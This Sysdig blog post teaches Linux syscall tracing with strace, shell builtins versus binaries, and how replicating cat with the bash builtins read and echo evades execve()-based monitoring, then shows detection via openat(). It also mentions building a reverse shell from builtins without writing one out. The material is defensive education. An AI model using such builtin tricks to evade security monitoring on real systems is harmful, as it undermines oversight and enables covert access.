close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre2-8.so.0", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=613064, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 615184, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9e91000
mmap(0x7f07f9e93000, 438272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f07f9e93000
mmap(0x7f07f9efe000, 163840, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6d000) = 0x7f07f9efe000
mmap(0x7f07f9f26000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x94000) = 0x7f07f9f26000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e8e000
arch_prctl(ARCH_SET_FS, 0x7f07f9e8e800) = 0
set_tid_address(0x7f07f9e8ead0)         = 877628
set_robust_list(0x7f07f9e8eae0, 24)     = 0
rseq(0x7f07f9e8f1a0, 0x20, 0, 0x53053053) = 0
mprotect(0x7f07f9e15000, 16384, PROT_READ) = 0
mprotect(0x7f07f9f26000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f50000, 4096, PROT_READ) = 0
mprotect(0x5650f62f3000, 4096, PROT_READ) = 0
mprotect(0x7f07f9f9d000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7f07f9f54000, 61191)           = 0
statfs("/sys/fs/selinux", 0x7fff2e5ae580) = -1 ENOENT (No such file or directory)
statfs("/selinux", 0x7fff2e5ae580)      = -1 ENOENT (No such file or directory)
getrandom("\x9a\x10\x6f\x3b\x21\xc0\xe9\x56", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5650f69b7000
brk(0x5650f69d8000)                     = 0x5650f69d8000
openat(AT_FDCWD, "/proc/filesystems", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "nodev\tsysfs\nnodev\ttmpfs\nnodev\tbd"..., 1024) = 421
read(3, "", 1024)                       = 0
close(3)                                = 0
access("/etc/selinux/config", F_OK)     = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=5712208, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 5712208, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9600000
close(3)                                = 0
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, TIOCGWINSZ, {ws_row=48, ws_col=143, ws_xpixel=0, ws_ypixel=0}) = 0
openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
newfstatat(3, "", {st_mode=S_IFDIR|0775, st_size=4096, ...}, AT_EMPTY_PATH) = 0
getdents64(3, 0x5650f69bd9f0 /* 3 entries */, 32768) = 80
getdents64(3, 0x5650f69bd9f0 /* 0 entries */, 32768) = 0
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
write(1, "testfile\n", 9testfile
)               = 9
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++


Strace has a considerably larger set of capabilities than what we touched on here. A good starting place for digging into it further can be found in the documentation

Now that we’ve covered syscalls, let’s talk a bit about system shells. 

Linux System Shell 101

System shells are interfaces that allow us to interact with an operating system. While shells can be graphical in nature, most of the time when we hear the word shell, it will be in reference to a command-line shell accessed through a terminal application. The shell interprets commands from the user and passes them onto the kernel via, you guessed it, syscalls. We can use the shell to interact with the resources we discussed earlier as being available via syscalls, such as networks, files, and hardware components. 

On any given Linux installation, there will be one or more shells installed. On a typical server or desktop installation, we’ll likely find a small handful of them installed by default. On a purposefully stripped-down distribution, such as those used for containers, there may only be one. 

On most distributions, we can easily ask about the shell environment that we are operating in: 

1 – Reading /etc/shells should get us a list of which shells are installed on the system. Here we can see sh, bash, rbash, dash, and zsh as available shells. 

NOTE: The contents of /etc/shells isn’t, in all cases, the complete list of shells on the system. It’s a list of which ones can be used as login shells. These are generally the same list, but YMMV.

15 – We can easily check which shell we’re currently using by executing echo $0. In this case, we’re running the bash shell.

19 – Switching to another shell is simple enough. We can see that zsh is present in our list of shells and we can change to it by simply issuing zsh from our current shell. 

21 – Once in zsh, we’ll ask which shell we are in again, and we can see it is now zsh.

25 – We’ll then exit zsh, which will land us back in our previous shell. If we check which shell we’re in again, we can see it is bash once again. 

$ cat /etc/shells

# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/usr/bin/sh
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh

$ echo $0

/bin/bash

$ zsh

% echo $0

zsh

% exit

$ echo $0

/bin/bash

As we walk through the rest of our discussion, we’ll be focusing on the bash shell. The various shells have somewhat differing functionality, but are usually similar, at least in broad strokes. Bash stands for “Bourne Again SHell” as it was designed as a replacement for the original Bourne shell. We’ll often find the Bourne shell on many systems also. It’s in the list we looked at above at /bin/sh

All this is great, you might say, but we were promised syscall evasion. Hold tight, we have one more background bit to cover, then we’ll talk about those parts. 

Shell Builtins vs. External Binaries

When we execute a command in a shell, it can fall into one of several categories:

  • It can be a program binary external to our shell (we’ll call it a binary for short). 
  • It can be an alias, which is a sort of macro pointing to another command or commands. 
  • It can be a function, which is a user defined script or sequence of commands. 
  • It can be a keyword, a common example of which would be something like ‘if’ which we might use when writing a script. 
  • It can be a shell builtin, which is, as we might expect, a command built into the shell itself. We’ll focus primarily on binaries and builtins here. 

Identifying External Binaries

Let’s take another look at the ls command:

1 – We can use the which command to see the location of the command being executed when we run la. We’ll use the -a switch so it will return all of the results. We can see there are a couple results, but this doesn’t tell us what ls is, just where it is.

6 – To get a better idea of what is on the other end of ls when we run it, we can use the type command. Again, we’ll add the -a switch to get all the results. Here, we can see that there is one alias and two files in the filesystem behind the ls command.

7 – First, the alias will be evaluated. This particular alias adds the switch to colorize the output of ls when we execute it. 

8 – After this, there are two ls binaries in the filesystem. Which of these is executed depends on the order of our path. 

11 – If we take a look at the path, we can see that /usr/local/bin appears in the path before /bin, so /usr/local/bin/ls is the command being executed by the ls alias when we type ls into our shell. The final piece of information we need to know here is what type of command this particular ls is.

15 – We can use the file command to dig into ls. File tells us that this particular version of ls is a 64bit ELF binary. Circling all the way back around to our discussion on types of commands, this makes ls an external binary. 

21 – Incidentally, if we look at the other ls located in /bin, we will find that it is an identical file with an identical hash. What is this sorcery? If we use file to interrogate /bin, we’ll see that it’s a symlink to bin. We’re seeing the ls binary twice, but there is really only one copy of the file. 

$ which -a ls
/usr/bin/ls
/bin/ls


$ type -a ls
ls is aliased to `ls --color=auto'
ls is /usr/bin/ls
ls is /bin/ls

$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/sna
p/bin:/snap/bin

$ file /usr/bin/ls
/usr/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically
 linked, interpreter /lib64/ld-linux-x86-64.so.2,
 BuildID[sha1]=897f49cafa98c11d63e619e7e40352f855249c13, for GNU/Linux 3.2.0,
 stripped

$ file /bin
/bin: symbolic link to usr/bin

Identifying Shell Builtins

We briefly mentioned that a shell builtin is built into the binary of the shell itself. The builtins available for any given shell can vary quite widely. Let’s take a quick look at what we have available in bash:

1 – The compgen command is one of those esoteric command line kung-fu bits. In this case, we’ll use it with the -b switch, which effectively says “show me all the shell builtins.” We’ll also do a little formatting to show the output in columns and then show a count of the results.

2 – We can see some common commands in the output, like cd, echo, and pwd (also note the compgen command we just ran). When we execute these, we don’t reach out to any other binaries inside the filesystem, we do it all inside of the bash shell already running. 

17 – We should also note that just because one of these commands is in the builtins list for our shell, it can also be elsewhere. If we use the type command again to inquire about echo, which is in our builtins list, type will tell us it is a shell builtin, but we will also see a binary sitting in the filesystem. If we run echo from bash, we will get the builtin, but if we run it from another shell without a builtin echo, we may get the one from the filesystem instead. 

$ compgen -b | pr -5 -t; echo "Count: $(compgen -b | wc -l)"
.	      compopt	    fc		  popd		suspend
:	      continue	    fg		  printf	            test
[	      declare	    getopts	  pushd	times
alias	      dirs	    hash	  pwd		trap
bg	      disown	    help	              read		true
bind	      echo	    history	  readarray	type
break	      enable	    jobs	              readonly	typeset
builtin	      eval	    kill	              return	            ulimit
caller	      exec	    let		  set		umask
cd	      exit 	    local	              shift		unalias
command export	    logout	  shopt		unset
compgen  false	    mapfile	  source	wait
complete
Count: 61

$ type -a echo
echo is a shell builtin
echo is /usr/bin/echo
echo is /bin/echo


It’s also important to note that this set of builtins are specific to the bash shell, and other shells may be very different. Let’s take a quick look at the builtins for zsh.

1 - Zsh doesn’t have compgen, so we’ll need to get the data we want in a different manner. We’ll access the builtins associative array, which contains all the builtin commands of zsh, then do some formatting to make the results a bit more sane and put the output into columns, lastly getting a count of the results.

% print -roC5 -- ${(k)builtins}; echo "Count: ${(k)#builtins}"

-                           compquote     fg                  pushln         umask
.                           compset         float              pwd             unalias
:                           comptags       functions      r                   unfunction
[                           comptry          getln             read             unhash
alias                    compvalues    getopts         readonly      unlimit
autoload              continue          hash             rehash        unset
bg                        declare           history           return          unsetopt
bindkey                dirs                 integer          sched          vared
break                   disable            jobs              set               wait
builtin                   disown            kill                setopt           whence
bye                       echo               let                shift              where
cd                         echotc            limit             source          which
chdir                     echoti             local            suspend       zcompile
command            emulate          log               test               zf_ln
compadd              enable            logout          times           zformat
comparguments  eval                noglob          trap              zle
compcall              exec               popd            true               zmodload
compctl                exit                 print             ttyctl             zparseopts
compdescribe     export             printf            type              zregexparse
compfiles             false               private         typeset         zstat
compgroups         fc                   pushd          ulimit            zstyle
Count: 105
NOTE:
Print what now? “% print -roC5 — ${(k)builtins}; echo “Count: ${(k)#builtins}” can be a bit difficult to parse. Here’s a breakdown of what each part does:
%: This indicates that we’re (probably) in the Zsh shell.
print: This is a command in Zsh used to display text.
-roC5: These are options for the print command.
-r: Don’t treat backslashes as escape characters.
-o: Sort the printed list in alphabetical order.
C5: Format the output into 5 columns.
–: This signifies the end of the options for the command. Anything after this is treated as an argument, not an option.
${(k)builtins}: This is a parameter expansion in Zsh.
${…}: Parameter expansion syntax in Zsh.
(k): A flag to list the keys of an associative array.
builtins: Refers to an associative array in Zsh that contains all built-in commands.
echo “Count: ${(k)#builtins}”: This part of the command prints the count of built-in commands.
echo: A command to display the following text.
“Count: “: The text to be displayed.
${(k)#builtins}: Counts the number of keys in the builtins associative array, which in this context means counting all built-in commands in Zsh.
In simple terms, this command lists all the built-in commands available in the Zsh shell, formats them into five columns, and then displays the total count of these commands.

We can see here that there are over 40 more builtins in zsh than there are in bash. Many of them are the same as what we see in bash, but the availability of builtin commands is something to validate when working with different shells. We’ll continue working with bash as it’s one of the more commonly used shells that we might encounter, but this is certainly worth bearing in mind. 

Now that we know a bit about the shell and shell builtins, let’s look at how we can use these for syscall evasion.

Syscall Evasion Techniques Using Bash Builtins

As we mentioned earlier, many security tools that monitor syscalls monitor for process execution via the execve() syscall. From a certain tool design perspective, this is a great solution as it limits the number of syscalls we need to watch and should catch most of the interesting things going on. For example, let’s use cat to read out the contents of a file and watch what happens with strace:

1 – First, we’ll echo a bit of data into the test file we used earlier so we have something to play with. Then, we’ll cat the file and we can see the output with the file contents.

5 – Now let’s do this again, but this time we’ll watch what happens with strace. We’ll spin up a new bash shell which we will monitor with strace. This time, we’ll also add the -f switch so strace will monitor subprocesses as well. This will result in a bit of extra noise in the output, but we need this in order to get a better view of what is happening as we’re operating in a new shell. Note that strace is now specifying the pid (process id) at the beginning of each syscall as we’re watching multiple processes.

6 – Here we have the execve() syscall taking place for the bash shell we just started. We can see the different subprocesses taking place as bash starts up.

34 – Now we’re dropped back to a prompt, but still operating inside the shell being monitored with strace. Let’s cat the file again and watch the output. 

37 – We can see the syscall for our cat here, along with the results of the command. This is all great, right? We were able to monitor the command with strace and see its execution. We saw the exact command we ran and the output of the command. 

$ echo supersecretdata >> testfile
$ cat testfile 
supersecretdata

$ strace -f -e trace=execve bash
execve("/usr/bin/bash", ["bash"], 0x7ffee6b6c710 /* 54 vars */) = 0
strace: Process 884939 attached
[pid 884939] execve("/usr/bin/lesspipe", ["lesspipe"], 0x55aa1d8a3090 /* 54 vars */) = 0
strace: Process 884940 attached
[pid 884940] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x55983907af68 /* 54 vars */) = 0
[pid 884940] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
 si_pid=884940, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884941 attached
strace: Process 884942 attached
[pid 884942] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x559839087108 /* 54 vars */) = 0
[pid 884942] +++ exited with 0 +++
[pid 884941] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884942, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884941] +++ exited with 0 +++
[pid 884939] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884941, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884939] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884939,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884943 attached
[pid 884943] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x55aa1d8a2d10 /* 54 vars
*/) = 0
[pid 884943] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884943,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ cat testfile

strace: Process 884946 attached
[pid 884946] execve("/usr/bin/cat", ["cat", "testfile"], 0x55aa1d8a9520 /* 54 vars */) = 0
supersecretdata
[pid 884946] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884946,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---

$ exit
exit
+++ exited with 0 +++


Let’s try being sneakier about things by using a little shell scripting of a bash builtin and see what the results are: 

1 – We’ll start a new bash shell and watch it with strace, the same as we did previously.

3 – Here’s the execve() syscall for the bash shell, just as we expected.

31 – And we’re dropped back to the prompt. This time, instead of using cat, we’ll use two of the bash builtins to frankenstein a command together and replicate what cat does:

while IFS= read -r line; do echo "$line"; done < testfile

This uses the bash builtins read and echo to process our file line by line. We use read to fetch each line from testfile into the variable line, with the -r switch to ensure any backslashes are read literally. The IFS= (internal field separator) preserves leading and trailing whitespaces. Then, echo outputs each line exactly as it’s read.

35 – Zounds! We’re dropped back to the prompt with no output from strace at all.

$ strace -f -e trace=execve bash

execve("/usr/bin/bash", ["bash"], 0x7fff866fefc0 /* 54 vars */) = 0
strace: Process 884993 attached
[pid 884993] execve("/usr/bin/lesspipe", ["lesspipe"], 0x5620a56bf090 /* 54 vars */) = 0
strace: Process 884994 attached
[pid 884994] execve("/usr/bin/basename", ["basename", "/usr/bin/lesspipe"],
0x558950f6cf68 /* 54 vars */) = 0
[pid 884994] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884994, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884995 attached
strace: Process 884996 attached
[pid 884996] execve("/usr/bin/dirname", ["dirname", "/usr/bin/lesspipe"],
0x558950f79108 /* 54 vars */) = 0
[pid 884996] +++ exited with 0 +++
[pid 884995] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884996, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884995] +++ exited with 0 +++
[pid 884993] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=884995, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 884993] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884993,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 884997 attached
[pid 884997] execve("/usr/bin/dircolors", ["dircolors", "-b"], 0x5620a56bed10 /* 54 vars
*/) = 0
[pid 884997] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=884997,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
$ while IFS= read -r line; do echo "$line"; done < testfile

Supersecretdata

$ 

If we can’t see the activity while monitoring for process execution, how do we find it?

Looking for Syscalls in All the Right Places

The problem we were encountering with not seeing the sneaky bash builtin activity was largely due to looking in the wrong place. We couldn’t see anything happening with execve() because there was nothing to see. In this particular case, we know a file is being opened, so let’s try one of the open syscalls. In this particular case, we’re going to cheat and jump directly to looking at openat(), but it could very well be any of the open syscalls we discussed earlier. 

1 – We’ll start up the strace-monitored bash shell again. This time, our filter is based on openat() instead of execve().

2 – Note that we see a pretty different view of what is taking place when bash starts up this time since we’re watching for files being opened. 

72 – Back at the prompt, we’ll run our sneaky bit of bash script to read the file. 

73 – Et voilà, we see the openat() syscall for our file being opened and the resulting output. 

$ strace -f -e trace=openat bash
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libtinfo.so.6", O_RDONLY|O_CLOEXEC) =
3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/dev/tty", O_RDWR|O_NONBLOCK) = 3
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache",
O_RDONLY) = 3
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/terminfo/x/xterm-256color", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
strace: Process 984240 attached
[pid 984240] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/usr/bin/lesspipe", O_RDONLY) = 3
strace: Process 984241 attached
[pid 984241] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984241, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984242 attached
strace: Process 984243 attached
[pid 984243] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] +++ exited with 0 +++
[pid 984242] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984243, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984242] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984242, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984240] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984240,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984244 attached
[pid 984244] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD,
"/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
[pid 984244] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984244,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
openat(AT_FDCWD, "/usr/share/bash-completion/bash_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/init.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/apport_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/git-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/usr/lib/git-core/git-sh-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.inputrc", O_RDONLY) = -1 ENOENT (No such file or
directory)
openat(AT_FDCWD, "/etc/inputrc", O_RDONLY) = 3

$ while IFS= read -r line; do echo "$line"; done < testfile
openat(AT_FDCWD, "testfile", O_RDONLY)  = 3
supersecretdata

We can catch the activity from the shell builtins, in most cases, but it’s a matter of looking in the right places for the activity we want. It might be tempting to think we could just watch all the syscalls all the time, but doing so quickly becomes untenable. Our example above produces somewhere around 50 lines of strace output when we are filtering just for openat(). If we take the filtering off entirely and watch for all syscalls, it balloons out to 1,200 lines of output. 

This is being done inside a single shell with not much else going on. If we tried to do this across a running system, we would see exponentially more in the brief period of time before it melted down into a puddle of flaming goo from the load. In other words, there really isn’t any reasonable way to watch all the syscall activity all the time. The best we can do is to be intentional with what we choose to monitor. 

Conclusion

This exploration into syscall evasion using bash shell builtins illuminates just a fraction of the creative and subtle ways in which system interactions can be manipulated to bypass security measures. Security tools that solely focus on process execution for monitoring are inherently limited in scope and a more nuanced and comprehensive approach to monitoring system activity is needed to provide a better level of security.

The simple example we put together for replicating the functionality of cat dodged this entirely and allowed us to read the data from our file while flying completely under the radar of tools that were only looking for process execution. Unfortunately, this is the tip of the iceberg. 

Using the bash builtins in a similar fashion to what we did above, there are a number of similar ways we can combine them to replicate functionality of other tools and attacks. A very brief amount of Googling will turn up a well-known method for assembling a reverse shell using the bash builtins. Furthermore, we have all the various shells and all their different sets of builtins at our disposal to tinker with (we’ll leave this as an exercise for the reader). 

In the coming articles in this series, we’ll look at some other methods of syscall evasion. If you want to learn more, explore Defense evasion techniques with Falco.  

The post Exploring Syscall Evasion – Linux Shell Built-ins appeared first on Sysdig.

]]>